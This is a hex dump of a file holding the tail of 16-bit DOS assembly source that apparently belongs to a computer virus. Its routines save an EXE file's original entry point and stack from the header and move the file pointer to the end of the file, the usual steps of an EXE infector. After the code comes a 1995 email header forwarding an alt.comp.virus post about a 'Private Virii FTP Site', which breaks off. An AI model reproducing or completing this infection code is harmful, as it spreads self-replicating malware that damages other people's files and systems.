|00002ba0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002bb0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 0a 0a 0a |--------|-----...|
|00002bc0| 0a 0a 0a 0a 0a 0a 0a 0a | 3b 2d 2d 2d 2d 2d 2d 2d |........|;-------|
|00002bd0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002be0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 20 53 74 6f 72 65 20 |--------|- Store |
|00002bf0| 48 65 61 64 65 72 20 2d | 2d 2d 2d 2d 2d 2d 2d 2d |Header -|--------|
|00002c00| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002c10| 2d 2d 2d 2d 0a 0a 73 74 | 6f 72 65 5f 68 65 61 64 |----..st|ore_head|
|00002c20| 65 72 3a 0a 20 20 20 20 | 20 20 20 20 6c 65 73 20 |er:. | les |
|00002c30| 20 61 78 2c 20 64 77 6f | 72 64 20 70 74 72 20 5b | ax, dwo|rd ptr [|
|00002c40| 62 75 66 66 65 72 2b 31 | 34 68 2d 31 30 30 68 5d |buffer+1|4h-100h]|
|00002c50| 20 20 20 20 20 20 3b 20 | 53 61 76 65 20 6f 6c 64 | ; |Save old|
|00002c60| 20 65 6e 74 72 79 20 70 | 6f 69 6e 74 0a 20 20 20 | entry p|oint. |
|00002c70| 20 20 20 20 20 6d 6f 76 | 20 20 77 6f 72 64 20 70 | mov| word p|
|00002c80| 74 72 20 5b 4f 72 69 67 | 43 53 49 50 2d 31 30 30 |tr [Orig|CSIP-100|
|00002c90| 68 5d 2c 20 61 78 0a 20 | 20 20 20 20 20 20 20 6d |h], ax. | m|
|00002ca0| 6f 76 20 20 77 6f 72 64 | 20 70 74 72 20 5b 4f 72 |ov word| ptr [Or|
|00002cb0| 69 67 43 53 49 50 2b 32 | 2d 31 30 30 68 5d 2c 20 |igCSIP+2|-100h], |
|00002cc0| 65 73 0a 0a 20 20 20 20 | 20 20 20 20 6c 65 73 20 |es.. | les |
|00002cd0| 20 61 78 2c 20 64 77 6f | 72 64 20 70 74 72 20 5b | ax, dwo|rd ptr [|
|00002ce0| 62 75 66 66 65 72 2b 30 | 45 68 2d 31 30 30 68 5d |buffer+0|Eh-100h]|
|00002cf0| 20 20 20 20 20 20 3b 20 | 53 61 76 65 20 6f 6c 64 | ; |Save old|
|00002d00| 20 73 74 61 63 6b 0a 20 | 20 20 20 20 20 20 20 6d | stack. | m|
|00002d10| 6f 76 20 20 77 6f 72 64 | 20 70 74 72 20 5b 4f 72 |ov word| ptr [Or|
|00002d20| 69 67 53 53 53 50 2d 31 | 30 30 68 5d 2c 20 65 73 |igSSSP-1|00h], es|
|00002d30| 0a 20 20 20 20 20 20 20 | 20 6d 6f 76 20 20 77 6f |. | mov wo|
|00002d40| 72 64 20 70 74 72 20 5b | 4f 72 69 67 53 53 53 50 |rd ptr [|OrigSSSP|
|00002d50| 2b 32 2d 31 30 30 68 5d | 2c 20 61 78 0a 0a 20 20 |+2-100h]|, ax.. |
|00002d60| 20 20 20 20 20 20 72 65 | 74 6e 0a 0a 3b 2d 2d 2d | re|tn..;---|
|00002d70| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002d80| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002d90| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002da0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002db0| 2d 2d 2d 2d 2d 2d 2d 2d | 0a 0a 0a 0a 0a 0a 0a 3b |--------|.......;|
|00002dc0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002dd0| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002de0| 2d 2d 20 53 65 74 20 66 | 69 6c 65 20 70 6f 69 6e |-- Set f|ile poin|
|00002df0| 74 65 72 20 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |ter ----|--------|
|00002e00| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 0a 0a 6d 6f |--------|----..mo|
|00002e10| 76 65 5f 66 5f 70 74 72 | 66 61 72 3a 20 20 20 20 |ve_f_ptr|far: |
|00002e20| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00002e30| 20 20 20 20 20 20 20 20 | 20 20 20 20 20 20 20 20 | | |
|00002e40| 3b 20 43 6f 64 65 20 74 | 6f 20 6d 6f 76 65 20 66 |; Code t|o move f|
|00002e50| 69 6c 65 20 70 6f 69 6e | 74 65 72 2e 0a 20 20 20 |ile poin|ter.. |
|00002e60| 20 20 20 20 20 6d 6f 76 | 20 61 78 2c 34 32 30 32 | mov| ax,4202|
|00002e70| 68 0a 20 20 20 20 20 20 | 20 20 6a 6d 70 20 73 68 |h. | jmp sh|
|00002e80| 6f 72 74 20 6d 6f 76 65 | 5f 66 0a 0a 6d 6f 76 65 |ort move|_f..move|
|00002e90| 5f 66 5f 70 74 72 63 6c | 6f 73 65 3a 0a 20 20 20 |_f_ptrcl|ose:. |
|00002ea0| 20 20 20 20 20 6d 6f 76 | 20 61 78 2c 34 32 30 30 | mov| ax,4200|
|00002eb0| 68 0a 0a 6d 6f 76 65 5f | 66 3a 0a 20 20 20 20 20 |h..move_|f:. |
|00002ec0| 20 20 20 78 6f 72 20 64 | 78 2c 64 78 0a 20 20 20 | xor d|x,dx. |
|00002ed0| 20 20 20 20 20 78 6f 72 | 20 63 78 2c 63 78 0a 20 | xor| cx,cx. |
|00002ee0| 20 20 20 20 20 20 20 63 | 61 6c 6c 20 64 6f 73 69 | c|all dosi|
|00002ef0| 74 0a 20 20 20 20 20 20 | 20 20 72 65 74 6e 0a 0a |t. | retn..|
|00002f00| 3b 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |;-------|--------|
|00002f10| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002f20| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002f30| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 2d 2d 2d |--------|--------|
|00002f40| 2d 2d 2d 2d 2d 2d 2d 2d | 2d 2d 2d 2d 2d 0a 0a 0a |--------|-----...|
|00002f50| 65 6e 64 63 6f 64 65 20 | 20 20 20 20 20 20 20 20 |endcode | |
|00002f60| 6c 61 62 65 6c 20 20 20 | 20 20 20 20 62 79 74 65 |label | byte|
|00002f70| 0a 0a 65 6e 64 70 0a 0a | 63 6f 64 65 20 65 6e 64 |..endp..|code end|
|00002f80| 73 0a 65 6e 64 20 20 73 | 74 61 72 74 0a 0a 46 72 |s.end s|tart..Fr|
|00002f90| 6f 6d 20 73 6d 74 70 20 | 46 72 69 20 4a 61 6e 20 |om smtp |Fri Jan |
|00002fa0| 32 37 20 31 33 3a 32 33 | 20 45 53 54 20 31 39 39 |27 13:23| EST 199|
|00002fb0| 35 0a 52 65 63 65 69 76 | 65 64 3a 20 66 72 6f 6d |5.Receiv|ed: from|
|00002fc0| 20 69 64 73 2e 6e 65 74 | 20 62 79 20 50 4f 42 4f | ids.net| by POBO|
|00002fd0| 58 2e 6a 77 75 2e 65 64 | 75 3b 20 46 72 69 2c 20 |X.jwu.ed|u; Fri, |
|00002fe0| 32 37 20 4a 61 6e 20 39 | 35 20 31 33 3a 32 33 20 |27 Jan 9|5 13:23 |
|00002ff0| 45 53 54 0a 44 61 74 65 | 3a 20 46 72 69 2c 20 32 |EST.Date|: Fri, 2|
|00003000| 37 20 4a 61 6e 20 31 39 | 39 35 20 31 33 3a 32 31 |7 Jan 19|95 13:21|
|00003010| 3a 33 38 20 2d 30 35 30 | 30 20 28 45 53 54 29 0a |:38 -050|0 (EST).|
|00003020| 46 72 6f 6d 3a 20 69 64 | 73 2e 6e 65 74 21 4a 4f |From: id|s.net!JO|
|00003030| 53 48 55 41 57 20 28 4a | 4f 53 48 55 41 57 29 0a |SHUAW (J|OSHUAW).|
|00003040| 54 6f 3a 20 70 6f 62 6f | 78 2e 6a 77 75 2e 65 64 |To: pobo|x.jwu.ed|
|00003050| 75 21 6a 6f 73 68 75 61 | 77 20 0a 43 6f 6e 74 65 |u!joshua|w .Conte|
|00003060| 6e 74 2d 4c 65 6e 67 74 | 68 3a 20 31 31 37 39 0a |nt-Lengt|h: 1179.|
|00003070| 43 6f 6e 74 65 6e 74 2d | 54 79 70 65 3a 20 62 69 |Content-|Type: bi|
|00003080| 6e 61 72 79 0a 4d 65 73 | 73 61 67 65 2d 49 64 3a |nary.Mes|sage-Id:|
|00003090| 20 3c 39 35 30 31 32 37 | 31 33 32 31 33 38 2e 62 | <950127|132138.b|
|000030a0| 35 32 62 40 69 64 73 2e | 6e 65 74 3e 0a 53 74 61 |52b@ids.|net>.Sta|
|000030b0| 74 75 73 3a 20 52 4f 0a | 0a 54 6f 3a 20 6a 6f 73 |tus: RO.|.To: jos|
|000030c0| 68 75 61 77 40 70 6f 62 | 6f 78 2e 6a 77 75 2e 65 |huaw@pob|ox.jwu.e|
|000030d0| 64 75 0a 53 75 62 6a 65 | 63 74 3a 20 28 66 77 64 |du.Subje|ct: (fwd|
|000030e0| 29 20 50 72 69 76 61 74 | 65 20 56 69 72 69 69 20 |) Privat|e Virii |
|000030f0| 46 54 50 20 53 69 74 65 | 0a 4e 65 77 73 67 72 6f |FTP Site|.Newsgro|
|00003100| 75 70 73 3a 20 61 6c 74 | 2e 63 6f 6d 70 2e 76 69 |ups: alt|.comp.vi|
|00003110| 72 75 73 0a 0a 50 61 74 | 68 3a 20 70 61 70 65 72 |rus..Pat|h: paper|
|00003120| 62 6f 79 2e 69 64 73 2e | 6e 65 74 21 75 75 6e 65 |boy.ids.|net!uune|
|00003130| 74 21 6e 6e 74 70 2e 63 | 72 6c 2e 63 6f 6d 21 63 |t!nntp.c|rl.com!c|
|00003140| 72 6c 31 32 2e 63 72 6c | 2e 63 6f 6d 21 6e 6f 74 |rl12.crl|.com!not|
|00003150| 2d 66 6f 72 2d 6d 61 69 | 6c 0a 46 72 6f 6d 3a 20 |-for-mai|l.From: |
|00003160| 79 6f 6a 69 6d 62 6f 40 | 63 72 6c 2e 63 6f 6d 20 |yojimbo@|crl.com |
|00003170| 28 44 6f 75 67 6c 61 73 | 20 4d 61 75 6c 64 69 6e |(Douglas| Mauldin|
|00003180| 29 0a 4e 65 77 73 67 72 | 6f 75 70 73 3a 20 61 6c |).Newsgr|oups: al|
+--------+-------------------------+-------------------------+--------+--------+